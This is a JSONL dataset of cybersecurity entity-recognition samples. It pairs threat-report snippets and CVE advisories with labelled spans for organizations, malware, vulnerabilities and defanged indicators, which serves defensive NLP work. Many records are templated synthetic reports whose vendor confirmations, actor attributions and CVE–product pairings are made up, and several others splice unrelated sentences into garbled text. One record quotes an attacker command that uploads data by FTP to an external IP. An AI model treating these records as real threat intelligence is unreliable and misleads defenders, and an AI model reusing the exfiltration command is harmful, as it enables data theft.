{"text": "Additional SideWinder C2 domains discovered by Kaspersky include modpak-info[ . ]services, pmd-offc[.]info, dirctt888[ . ]com, mods[.]email, dowmload[ . ]co, downl0ad[.]org, d0wnlaod[ . ]org, dirctt88[.]info, directt88[ . ]com, aliyum[ . ]email, d0cumentview[ . ]info, debcon[ . ]live, document-viewer[ . ]live, documentviewer[.]info, ms-office[ . ]pro, pncert[.]info, session-out[ . ]com, ziptec[.]info, depo-govpk[ . ]com, crontec[ . ]site, mteron[.]info, mevron[ . ]tech, and veorey[.]live. Additional file hashes: e0bce049c71bc81afe172cd30be4d2b7, 872c2ddf6467b1220ee83dca0e118214, 3d9961991e7ae6ad2bae09c475a1bce8, a694ccdb82b061c26c35f612d68ed1c2, f42ba43f7328cbc9ce85b2482809ff1c, 0216ffc6fb679bdf4ea6ee7051213c1e, and 433480f7d8642076a8b3793948da5efe.", "spans": {"Organization: Kaspersky": [[47, 56]], "Indicator: modpak-info.services": [[65, 89]], "Indicator: pmd-offc.info": [[91, 106]], "Indicator: dirctt888.com": [[108, 125]], "Indicator: mods.email": [[127, 139]], "Indicator: dowmload.co": [[141, 156]], "Indicator: downl0ad.org": [[158, 172]], "Indicator: d0wnlaod.org": [[174, 190]], "Indicator: dirctt88.info": [[192, 207]], "Indicator: directt88.com": [[209, 226]], "Indicator: aliyum.email": [[228, 244]], "Indicator: d0cumentview.info": [[246, 267]], "Indicator: debcon.live": [[269, 284]], "Indicator: document-viewer.live": [[286, 310]], "Indicator: documentviewer.info": [[312, 333]], "Indicator: ms-office.pro": [[335, 352]], "Indicator: pncert.info": [[354, 367]], "Indicator: session-out.com": [[369, 388]], "Indicator: ziptec.info": [[390, 403]], "Indicator: depo-govpk.com": [[405, 423]], "Indicator: crontec.site": [[425, 441]], "Indicator: mteron.info": [[443, 456]], "Indicator: mevron.tech": [[458, 473]], "Indicator: veorey.live": [[479, 492]], "Indicator: e0bce049c71bc81afe172cd30be4d2b7": [[518, 550]], "Indicator: 872c2ddf6467b1220ee83dca0e118214": [[552, 584]], "Indicator: 3d9961991e7ae6ad2bae09c475a1bce8": [[586, 618]], "Indicator: a694ccdb82b061c26c35f612d68ed1c2": [[620, 652]], "Indicator: f42ba43f7328cbc9ce85b2482809ff1c": [[654, 686]], "Indicator: 0216ffc6fb679bdf4ea6ee7051213c1e": [[688, 720]], "Indicator: 433480f7d8642076a8b3793948da5efe": [[726, 758]]}, "info": {"id": "malware_00013", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.Heur.kmGfrjraeapm2 W32/Trojan-Gypikon-based.DM2!Ma BehavesLike[.]Win32[.]Downloader[.]cc W32/Trojan-Gypikon-based.DM2!Ma Trojan/Banker.Banker.zmm Worm:Win32/Xtrat.B!A BScope.Trojan-Spy.Zbot Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Downloader.cc": [[84, 121]]}, "info": {"id": "cyner2_train_004756", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2026-42806 is a critical XXE injection affecting Atlassian Confluence. Qualys confirmed active exploitation by Star Blizzard in the wild. Exploitation delivers DarkSide (MD5: 4fefc23485e9092b71d6b3605ce67f91) which is dropped to C:\\Windows\\Temp\\payload.bin. The exploit payload is hosted at hxxp://portal-cdn[ . ]xyz/callback and communicates to 10 [ . ] 87 [ . ] 216 [ . ] 80 for C2.", "spans": {"Vulnerability: CVE-2026-42806": [[24, 38]], "Vulnerability: XXE injection": [[53, 66]], "System: Atlassian Confluence": [[77, 97]], "Organization: Qualys": [[99, 105]], "Malware: DarkSide": [[188, 196]], "Indicator: 4fefc23485e9092b71d6b3605ce67f91": [[203, 235]], "Indicator: hxxp://portal-cdn.xyz/callback": [[319, 353]], "Indicator: 10.87.216.80": [[374, 404]]}, "info": {"id": "synth_v2_00803", "source": "defanged_augment"}}
{"text": "IOC Bulletin - XLoader Campaign:\nNetwork Indicators:\n- 51[.]27[.]239[.]138\n- 192 [ . ] 150 [ . ] 255 [ . ] 104\n- 176 [ . ] 12 [ . ] 25 [ . ] 244\n- nodelogin[ . ]info\n- portalgateway[.]site\nURLs:\n- hxxps://edgedata[ . ]site/admin/config\n- hxxp://cloudnode[.]site/admin/config\nEmail Senders:\n- it@phishing-domain[.]com\n- account@auth-check[.]org\nFile Indicators:\n- MD5: c58850cc770528f4fa883b59e8cfda55\n- SHA1: 07ea732840713e55a5462ce05861a31b264090ef\n- Drop path: /opt/app/bin/shell.php", "spans": {"Malware: XLoader": [[15, 22]], "Indicator: 51.27.239.138": [[55, 74]], "Indicator: 192.150.255.104": [[77, 110]], "Indicator: 176.12.25.244": [[113, 144]], "Indicator: nodelogin.info": [[147, 165]], "Indicator: portalgateway.site": [[168, 188]], "Indicator: hxxps://edgedata.site/admin/config": [[197, 235]], "Indicator: hxxp://cloudnode.site/admin/config": [[238, 274]], "Indicator: it@phishing-domain.com": [[292, 316]], "Indicator: account@auth-check.org": [[319, 343]], "Indicator: c58850cc770528f4fa883b59e8cfda55": [[368, 400]], "Indicator: 07ea732840713e55a5462ce05861a31b264090ef": [[409, 449]]}, "info": {"id": "synth_v2_01432", "source": "defanged_augment"}}
{"text": "Based on our culprit ’ s email address , we were able to find his GitHub repository . The malware then builds two DLLs in memory – they are 32 and 64-bit DLLs that have identical functionality . Filename: How can North Korean hydrogen bomb wipe out Manhattan[.]scr .", "spans": {"Organization: GitHub": [[66, 72]], "Malware: malware": [[90, 97]], "Malware: DLLs": [[114, 118]], "Indicator: How can North Korean hydrogen bomb wipe out Manhattan.scr": [[205, 264]]}, "info": {"id": "cyberner_stix_train_002878", "source": "defanged_augment"}}
{"text": "Sophos X-Ops published a threat intelligence report linking Salt Typhoon to a new campaign exploiting CVE-2021-32298 in F5 BIG-IP. The attackers deployed Qbot via Brute Ratel, establishing C2 communication with 10 [ . ] 206 [ . ] 211 [ . ] 10 and storagemail[ . ]live. A secondary payload was downloaded from hxxp://data-relay[.]tech/assets/js/payload.js. The malware binary (SHA1: ea830fc544ebfc159dfc565f5b1be61abf5ef84a) was dropped to /etc/cron.d/sam.hive. Phishing emails were sent from alert@secure-verify[.]net targeting enterprise users. A backup C2 server was identified at 10[.]155[.]105[.]168.", "spans": {"Organization: Sophos X-Ops": [[0, 12]], "Vulnerability: CVE-2021-32298": [[102, 116]], "System: F5 BIG-IP": [[120, 129]], "Malware: Qbot": [[154, 158]], "Indicator: 10.206.211.10": [[211, 242]], "Indicator: storagemail.live": [[247, 267]], "Indicator: http://data-relay.tech/assets/js/payload.js": [[309, 354]], "Indicator: ea830fc544ebfc159dfc565f5b1be61abf5ef84a": [[382, 422]], "Indicator: alert@secure-verify.net": [[492, 517]], "Indicator: 10.155.105.168": [[583, 603]]}, "info": {"id": "synth_v2_00140", "source": "defanged_augment"}}
{"text": "Blog Post by INTERPOL: Tracking Sandworm's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-39714 against Progress Telerik deployments. The initial access vector involves spear-phishing emails from admin@account-update[.]xyz delivering Latrodectus. Post-compromise, the attackers deploy Hive and use Brute Ratel for reconnaissance. C2 infrastructure includes 84 [ . ] 84 [ . ] 159 [ . ] 231 and proxy-gateway[.]com. A staging server at hxxp://backupauth[.]info/portal/verify hosts additional tooling. Key artifact: C:\\Program Files\\Common Files\\taskhost.exe (MD5: 6db6d55057415dfc296f7704db422d73).", "spans": {"Organization: INTERPOL": [[13, 21]], "Vulnerability: CVE-2023-39714": [[120, 134]], "System: Progress Telerik": [[143, 159]], "Indicator: admin@account-update.xyz": [[235, 261]], "Malware: Latrodectus": [[273, 284]], "Malware: Hive": [[324, 328]], "Indicator: 84.84.159.231": [[396, 427]], "Indicator: proxy-gateway.com": [[432, 451]], "Indicator: http://backupauth.info/portal/verify": [[473, 511]], "Indicator: 6db6d55057415dfc296f7704db422d73": [[601, 633]]}, "info": {"id": "synth_v2_01562", "source": "defanged_augment"}}
{"text": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3[.]6[.]6[.]922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of CMP files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated structure. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-11337.", "spans": {"Indicator: 3.6.6.922": [[125, 140]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-17429"}}
{"text": "Google TAG published a threat intelligence report linking Star Blizzard to a new campaign exploiting CVE-2023-33283 in Juniper SRX. The attackers deployed Amadey via Certutil, establishing C2 communication with 55[.]102[.]159[.]103 and api-storage[.]com. A secondary payload was downloaded from hxxps://cache-data[ . ]com/assets/js/payload.js. The malware binary (SHA1: b34e8181a11e04ad27121e7ca00ec86ed1c796c6) was dropped to C:\\Users\\admin\\AppData\\Local\\Temp\\helper.sh. Phishing emails were sent from info@phishing-domain[ . ]com targeting enterprise users. A backup C2 server was identified at 113 [ . ] 231 [ . ] 61 [ . ] 64.", "spans": {"Organization: Google TAG": [[0, 10]], "Vulnerability: CVE-2023-33283": [[101, 115]], "System: Juniper SRX": [[119, 130]], "Malware: Amadey": [[155, 161]], "Indicator: 55.102.159.103": [[211, 231]], "Indicator: api-storage.com": [[236, 253]], "Indicator: hxxps://cache-data.com/assets/js/payload.js": [[295, 342]], "Indicator: b34e8181a11e04ad27121e7ca00ec86ed1c796c6": [[370, 410]], "Indicator: info@phishing-domain.com": [[503, 531]], "Indicator: 113.231.61.64": [[597, 628]]}, "info": {"id": "synth_v2_00002", "source": "defanged_augment"}}
{"text": "Secureworks detected a multi-stage attack chain. The initial phishing email from noreply@document-share[ . ]link contained a link to hxxp://cdn-cache[ . ]live/callback. This redirected to hxxps://edge-node[.]site/assets/js/payload.js on backupcloud[ . ]link. A secondary email from noreply@auth-check[.]org pointed to hxxps://proxy-secure[ . ]com/panel/index.html which delivered TrickBot. The final payload callback was hxxps://mail-relay[ . ]link/api/v2/auth resolving to 210 [ . ] 191 [ . ] 215 [ . ] 129 via relaystorage[ . ]top.", "spans": {"Organization: Secureworks": [[0, 11]], "Indicator: noreply@document-share.link": [[81, 112]], "Indicator: hxxp://cdn-cache.live/callback": [[133, 167]], "Indicator: https://edge-node.site/assets/js/payload.js": [[188, 233]], "Indicator: backupcloud.link": [[237, 257]], "Indicator: noreply@auth-check.org": [[282, 306]], "Indicator: hxxps://proxy-secure.com/panel/index.html": [[318, 363]], "Malware: TrickBot": [[380, 388]], "Indicator: hxxps://mail-relay.link/api/v2/auth": [[421, 460]], "Indicator: 210.191.215.129": [[474, 507]], "Indicator: relaystorage.top": [[512, 532]]}, "info": {"id": "synth_v2_01769", "source": "defanged_augment"}}
{"text": "We continue to monitor its progress . ] com , which we previously identified in October 2017 to be an OilRig C2 . It can be proc[.]exe or chrome[ . ]exe or winrar[.]exe . External Server Requests Indicates an attempt to exfiltrate data to an external server .", "spans": {"Indicator: proc.exe": [[124, 134]], "Indicator: chrome.exe": [[138, 152]], "Indicator: winrar.exe": [[156, 168]]}, "info": {"id": "cyberner_stix_train_005713", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan-GameThief.Win32.OnLineGames!O Trojan.OnLineGames.Win32.215966 Trojan.Heur.RP.cmIfaG!Q79i TSPY_ONLINEG.TGV Win32.Trojan.WisdomEyes.16070401.9500.9941 Win32/Zuten[ . ]DK TSPY_ONLINEG.TGV Trojan-GameThief.Win32.OnLineGames.afmb Trojan.Win32.OnLineGames.cvmqrs Troj.GameThief.W32.OnLineGames.afmb!c TrojWare.Win32.Magania.~D Trojan.PWS.Gamania.9849 BehavesLike.Win32.Sytro.nc Virus.Win32.Onlinegames.BBH TrojanDownloader.Small.unq Trojan[GameThief]/Win32.OnLineGames Trojan:Win32/Hookja.A Trojan-GameThief.Win32.OnLineGames.afmb Trojan/Win32.OnlineGameHack.R70066 Trojan.Win32.OnlineGames.10068 Win32.Trojan-gamethief.Onlinegames.Wvkq W32/Onlinegames.KKW!tr.pws", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Zuten.DK": [[188, 200]]}, "info": {"id": "cyner2_train_005266", "source": "defanged_augment"}}
{"text": "We are constantly on the lookout for new threats and we are expanding our protections . Syncopate is a well-known Russian company that is best known as the developer and operator of the ' GameNet ' platform . Using host-based digital forensic analysis , CTU analysts observed the intruders using the native ‘ at[ . ]exe ’ Windows task scheduler tool to move laterally within the infrastructure . The web page “ about.htm ” implements an exploit for Microsoft Internet Explorer 8 .", "spans": {"Organization: company": [[122, 129]], "Organization: CTU": [[254, 257]], "Indicator: at.exe": [[309, 319]], "System: Windows": [[322, 329]], "System: Microsoft Internet Explorer 8": [[449, 478]]}, "info": {"id": "cyberner_stix_train_007316", "source": "defanged_augment"}}
{"text": "NATS-Server is a High-Performance server for NATS[ . ]io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, when using mTLS for client identity, with `verify_and_map` to derive a NATS identity from the client certificate's Subject DN, certain patterns of RDN would not be correctly enforced, allowing for authentication bypass. This does require a valid certificate from a CA already trusted for client certificates, and `DN` naming patterns which the NATS maintainers consider highly unlikely. So this is an unlikely attack. Nonetheless, administrators who have been very sophisticated in their `DN` construction patterns might conceivably be impacted. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, developers should review their CA issuing practices.", "spans": {"Indicator: NATS.io": [[45, 56]], "Vulnerability: authentication bypass": [[335, 356]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-33248"}}
{"text": "To activate this menu the operator needs to call the hardcoded number “ 9909 ” from the infected device : A hidden menu then instantly appears on the device display : The operator can use this interface to type any command for execution . Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer . APT33 : 8[.]26[.]21[.]120 mynetwork[.]ddns[.]net . Analysis into the malware and its functionality reveals that its capabilities are comparable to those employed in previous incidents and malware , such as and , which were both malware variants deployed in the past to impact electricity transmission and distribution via IEC-104 .", "spans": {"Indicator: 8.26.21.120": [[379, 396]], "Indicator: mynetwork.ddns.net": [[397, 419]]}, "info": {"id": "cyberner_stix_train_001808", "source": "defanged_augment"}}
{"text": "Tenable published a threat intelligence report linking Forest Blizzard to a new campaign exploiting CVE-2024-23934 in Citrix NetScaler. The attackers deployed XLoader via Nmap, establishing C2 communication with 123 [ . ] 236 [ . ] 228 [ . ] 92 and sync-login[ . ]dev. A secondary payload was downloaded from hxxps://sync-api[.]club/login. The malware binary (SHA1: 6cee7ffab9b17a0d4aa9182815bc0a5941c35abd) was dropped to C:\\Windows\\Temp\\shell.php. Phishing emails were sent from notification@identity-verify[.]cc targeting enterprise users. A backup C2 server was identified at 125 [ . ] 55 [ . ] 89 [ . ] 166.", "spans": {"Organization: Tenable": [[0, 7]], "Vulnerability: CVE-2024-23934": [[100, 114]], "System: Citrix NetScaler": [[118, 134]], "Malware: XLoader": [[159, 166]], "Indicator: 123.236.228.92": [[212, 244]], "Indicator: sync-login.dev": [[249, 267]], "Indicator: hxxps://sync-api.club/login": [[309, 338]], "Indicator: 6cee7ffab9b17a0d4aa9182815bc0a5941c35abd": [[366, 406]], "Indicator: notification@identity-verify.cc": [[481, 514]], "Indicator: 125.55.89.166": [[580, 611]]}, "info": {"id": "synth_v2_00153", "source": "defanged_augment"}}
{"text": "Relative library resolution in linux container-executor binary in Apache Hadoop 3.3.1-3.3.4 on Linux allows local user to gain root privileges. If the YARN cluster is accepting work from remote (authenticated) users, this MAY permit remote users to gain root privileges.\n\nHadoop 3.3.0 updated the \" YARN Secure Containers hxxps://hadoop[ . ]apache[ . ]org/docs/stable/hadoop-yarn/hadoop-yarn-site/SecureContainer.html \" to add a feature for executing user-submitted applications in isolated linux containers.\n\nThe native binary HADOOP_HOME/bin/container-executor is used to launch these containers; it must be owned by root and have the suid bit set in order for the YARN processes to run the containers as the specific users submitting the jobs.\n\nThe patch \" YARN-10495 hxxps://issues[.]apache[.]org/jira/browse/YARN-10495 . make the rpath of container-executor configurable\" modified the library loading path for loading .so files from \"$ORIGIN/\" to \"\"$ORIGIN/:../lib/native/\". This is the a path through which libcrypto.so is located. Thus it is is possible for a user with reduced privileges to install a malicious libcrypto library into a path to which they have write access, invoke the container-executor command, and have their modified library executed as root.\nIf the YARN cluster is accepting work from remote (authenticated) users, and these users' submitted job are executed in the physical host, rather than a container, then the CVE permits remote users to gain root privileges.\n\nThe fix for the vulnerability is to revert the change, which is done in  YARN-11441 hxxps://issues[ . ]apache[ . ]org/jira/browse/YARN-11441 , \"Revert YARN-10495\". This patch is in hadoop-3.3.5.\n\nTo determine whether a version of container-executor is vulnerable, use the readelf command. If the RUNPATH or RPATH value contains the relative path \"./lib/native/\" then it  is at risk\n\n$ readelf -d container-executor|grep 'RUNPATH\\|RPATH' \n0x000000000000001d (RUNPATH)            Library runpath: [$ORIGIN/:../lib/native/]\n\nIf it does not, then it is safe:\n\n$ readelf -d container-executor|grep 'RUNPATH\\|RPATH' \n0x000000000000001d (RUNPATH)            Library runpath: [$ORIGIN/]\n\nFor an at-risk version of container-executor to enable privilege escalation, the owner must be root and the suid bit must be set\n\n$ ls -laF /opt/hadoop/bin/container-executor\n---Sr-s---. 1 root hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executor\n\nA safe installation lacks the suid bit; ideally is also not owned by root.\n\n$ ls -laF /opt/hadoop/bin/container-executor\n-rwxr-xr-x. 1 yarn hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executor\n\nThis configuration does not support Yarn Secure Containers, but all other hadoop services, including YARN job execution outside secure containers continue to work.", "spans": {"Indicator: https://hadoop.apache.org/docs/stable/hadoop-yarn/hadoop-yarn-site/SecureContainer.html": [[322, 417]], "Indicator: https://issues.apache.org/jira/browse/YARN-10495": [[771, 823]], "Indicator: https://issues.apache.org/jira/browse/YARN-11441": [[1579, 1635]], "System: Linux": [[95, 100]], "System: Apache": [[66, 72]], "Vulnerability: privilege escalation": [[2230, 2250]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-26031"}}
{"text": "Vulnerability Advisory: CVE-2024-42717 is a critical IDOR vulnerability affecting Zyxel USG. Sophos X-Ops confirmed active exploitation by Mustang Panda in the wild. Exploitation delivers BumbleBee (MD5: 6ba3dfb264e42d2e047003c2f022ffe5) which is dropped to /etc/cron.d/backdoor.elf. The exploit payload is hosted at hxxps://datacloud[.]link/callback and communicates to 192 [ . ] 230 [ . ] 157 [ . ] 197 for C2.", "spans": {"Vulnerability: CVE-2024-42717": [[24, 38]], "Vulnerability: IDOR vulnerability": [[53, 71]], "System: Zyxel USG": [[82, 91]], "Organization: Sophos X-Ops": [[93, 105]], "Malware: BumbleBee": [[188, 197]], "Indicator: 6ba3dfb264e42d2e047003c2f022ffe5": [[204, 236]], "Indicator: hxxps://datacloud.link/callback": [[317, 350]], "Indicator: 192.230.157.197": [[371, 404]]}, "info": {"id": "synth_v2_00754", "source": "defanged_augment"}}
{"text": "Tenable published a threat intelligence report linking Charming Kitten to a new campaign exploiting CVE-2026-40674 in F5 BIG-IP. The attackers deployed SystemBC via Sliver, establishing C2 communication with 172 [ . ] 74 [ . ] 196 [ . ] 49 and updatebackup[.]club. A secondary payload was downloaded from hxxp://cachecache[.]top/download/update.exe. The malware binary (MD5: 629ab31c8a4ecd3db1cd2e1b40baac66) was dropped to /dev/shm/csrss.exe. Phishing emails were sent from ceo@urgent-notice[ . ]online targeting enterprise users. A backup C2 server was identified at 10[.]141[.]212[.]88.", "spans": {"Organization: Tenable": [[0, 7]], "Vulnerability: CVE-2026-40674": [[100, 114]], "System: F5 BIG-IP": [[118, 127]], "Malware: SystemBC": [[152, 160]], "Indicator: 172.74.196.49": [[208, 239]], "Indicator: updatebackup.club": [[244, 263]], "Indicator: http://cachecache.top/download/update.exe": [[305, 348]], "Indicator: 629ab31c8a4ecd3db1cd2e1b40baac66": [[375, 407]], "Indicator: ceo@urgent-notice.online": [[475, 503]], "Indicator: 10.141.212.88": [[569, 588]]}, "info": {"id": "synth_v2_00028", "source": "defanged_augment"}}
{"text": ". McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications . Later at 6:56 , the attackers exfiltrated data using this FTP tool to a remote host: JsuObf[ . ]exe Nup#Tntcommand -s CSIDL_PROFILE\\appdata\\roaming\\adobe\\rar -a ftp://89[.]34[.]237[.]118:2020 -f/[REDACTED]-u[REDACTED]-p[REDACTED] . Between Jan. 1 – June 20 , 2023 , Mandiant identified more than 500 distinct victims that the KillNet collective has allegedly targeted with DDoS attacks .", "spans": {"Organization: McAfee Advanced Threat Research": [[2, 33]], "Organization: critical infrastructure": [[145, 168]], "Organization: entertainment": [[171, 184]], "Organization: finance": [[187, 194]], "Organization: health care": [[197, 208]], "Organization: telecommunications": [[215, 233]], "Indicator: JsuObf.exe": [[321, 335]], "Indicator: 89.34.237.118": [[403, 422]]}, "info": {"id": "cyberner_stix_train_004513", "source": "defanged_augment"}}
{"text": "Sophos X-Ops published a threat intelligence report linking Flax Typhoon to a new campaign exploiting CVE-2021-37493 in Cisco ASA. The attackers deployed XLoader via LaZagne, establishing C2 communication with 10[.]71[.]244[.]83 and syncstorage[.]info. A secondary payload was downloaded from hxxp://sync-mail[.]club/login. The malware binary (SHA1: 399069f190452ace4efc3570ab38e184ff8375ac) was dropped to C:\\Users\\Public\\Documents\\sam.hive. Phishing emails were sent from finance@account-update[ . ]xyz targeting enterprise users. A backup C2 server was identified at 10 [ . ] 133 [ . ] 196 [ . ] 61.", "spans": {"Organization: Sophos X-Ops": [[0, 12]], "Vulnerability: CVE-2021-37493": [[102, 116]], "System: Cisco ASA": [[120, 129]], "Malware: XLoader": [[154, 161]], "Indicator: 10.71.244.83": [[210, 228]], "Indicator: syncstorage.info": [[233, 251]], "Indicator: hxxp://sync-mail.club/login": [[293, 322]], "Indicator: 399069f190452ace4efc3570ab38e184ff8375ac": [[350, 390]], "Indicator: finance@account-update.xyz": [[474, 504]], "Indicator: 10.133.196.61": [[570, 601]]}, "info": {"id": "synth_v2_00072", "source": "defanged_augment"}}
{"text": "Exploitation of CVE-2023-34362 was attributed to Winnti Group targeting Confluence Server instances. The exploit payload was served from 77[.]11[.]79[.]94 and communicated with secure-login[[ . ]]top for command-and-control. Post-exploitation, a webshell (SHA256: d51ab86ad6b7305fd99d17bf76097eaaba7cf0698a014af35770b207a65804cf) was deployed to C:\\Windows\\Temp\\nc.exe.", "spans": {"Vulnerability: CVE-2023-34362": [[16, 30]], "System: Confluence Server": [[72, 89]], "Indicator: 77.11.79.94": [[137, 154]], "Indicator: secure-login[.]top": [[177, 199]], "Indicator: d51ab86ad6b7305fd99d17bf76097eaaba7cf0698a014af35770b207a65804cf": [[264, 328]]}, "info": {"id": "synth_00050", "source": "defanged_augment"}}
{"text": "The fake doesn ’ t quite nail the app name . We assess with high confidence that APT37 acts in support of the North Korean government and is primarily based in North Korea . Exfiltration is done through the bitsadmin[ . ]exe . “ And his access was never shut off until today ? , ” asked the company ’s general counsel Mike Dacks .", "spans": {"Indicator: bitsadmin.exe": [[207, 224]], "Organization: company ’s general counsel": [[291, 317]], "Organization: Mike Dacks": [[318, 328]]}, "info": {"id": "cyberner_stix_train_006479", "source": "defanged_augment"}}
{"text": "Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.\n\nBased on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:\n\n1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.\n\n2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.\n\n3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID.\n\n4. Notarization - Using the `api[ . ]apple-cloudkit[ . ]com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified.\n\nAdversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. Exploitation for Defense Evasion), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.\n\nApplications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using Drive-by Compromise.", "spans": {"System: Gatekeeper": [[51, 61], [130, 140], [270, 280], [437, 447], [872, 882], [949, 959], [1091, 1101], [1269, 1279], [1409, 1419], [1740, 1750], [2085, 2095]], "Organization: Apple": [[187, 192], [1322, 1327], [1435, 1440]], "Indicator: api.apple-cloudkit.com": [[1372, 1402]], "System: API": [[1404, 1407]], "System: macOS": [[1888, 1893]]}, "info": {"source": "defanged_augment", "mitre_id": "T1553.001"}}
{"text": "This local port is used by Exodus Two to execute various commands on the Android device , such as enabling or disabling certain services , or parsing app databases . Suckfly conducted a multistage attack against an e-commerce organization . Corrupted file f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427 . imgonline-com-ua-dexifEEdWuIbNSv7G[ . ]jpg : The FBI released an advisory warning users about NFT phishing scams where developers are often approached via social media and tricked into visiting a malicious link .", "spans": {"Malware: Exodus Two": [[27, 37]], "System: Android": [[73, 80]], "Organization: e-commerce organization": [[215, 238]], "Indicator: f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427": [[256, 320]], "Indicator: imgonline-com-ua-dexifEEdWuIbNSv7G.jpg": [[323, 365]], "Organization: FBI": [[372, 375]]}, "info": {"id": "cyberner_stix_train_000387", "source": "defanged_augment"}}
{"text": "Opening the attached “ Defence & Security 2018 Conference Agenda[ . ]docx ” file does not immediately run malicious code to exploit the system .", "spans": {"Indicator: Defence & Security 2018 Conference Agenda.docx": [[23, 73]]}, "info": {"id": "cyberner_stix_train_004952", "source": "defanged_augment"}}
{"text": "IOC Bulletin - StealC Campaign:\nNetwork Indicators:\n- 192 [ . ] 105 [ . ] 15 [ . ] 52\n- 19[.]125[.]207[.]87\n- 10 [ . ] 165 [ . ] 222 [ . ] 188\n- staticstatic[.]live\n- relayupdate[ . ]club\nURLs:\n- hxxps://cdnupdate[.]online/callback\n- hxxp://sync-data[ . ]xyz/login\nEmail Senders:\n- support@mail-service[ . ]info\n- notification@secure-verify[ . ]net\nFile Indicators:\n- MD5: 28f8f6f55196d13d79552700a9a2959a\n- SHA256: f6847a0dbed71b6c728a3eb3fcbb9112a58131cf6dc4ed99296c03166e27f4f3\n- Drop path: /dev/shm/agent.py", "spans": {"Malware: StealC": [[15, 21]], "Indicator: 192.105.15.52": [[54, 85]], "Indicator: 19.125.207.87": [[88, 107]], "Indicator: 10.165.222.188": [[110, 142]], "Indicator: staticstatic.live": [[145, 164]], "Indicator: relayupdate.club": [[167, 187]], "Indicator: https://cdnupdate.online/callback": [[196, 231]], "Indicator: http://sync-data.xyz/login": [[234, 264]], "Indicator: support@mail-service.info": [[282, 311]], "Indicator: notification@secure-verify.net": [[314, 348]], "Indicator: 28f8f6f55196d13d79552700a9a2959a": [[373, 405]], "Indicator: f6847a0dbed71b6c728a3eb3fcbb9112a58131cf6dc4ed99296c03166e27f4f3": [[416, 480]]}, "info": {"id": "synth_v2_01415", "source": "defanged_augment"}}
{"text": "Key : HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleIndexer Value : %AppData%\\Platform\\sslwin[.]exe .", "spans": {"Indicator: %AppData%\\Platform\\sslwin.exe": [[79, 110]]}, "info": {"id": "cyberner_stix_train_004543", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2023-34260 is a critical deserialization flaw affecting F5 BIG-IP. Mandiant confirmed active exploitation by Flax Typhoon in the wild. Exploitation delivers LockBit (MD5: 92524d006c4e584012354d7dfd797402) which is dropped to /var/tmp/sam.hive. The exploit payload is hosted at hxxps://node-gateway[ . ]link/assets/js/payload.js and communicates to 172[.]99[.]83[.]223 for C2.", "spans": {"Vulnerability: CVE-2023-34260": [[24, 38]], "Vulnerability: deserialization flaw": [[53, 73]], "System: F5 BIG-IP": [[84, 93]], "Organization: Mandiant": [[95, 103]], "Malware: LockBit": [[185, 192]], "Indicator: 92524d006c4e584012354d7dfd797402": [[199, 231]], "Indicator: https://node-gateway.link/assets/js/payload.js": [[305, 355]], "Indicator: 172.99.83.223": [[376, 395]]}, "info": {"id": "synth_v2_00826", "source": "defanged_augment"}}
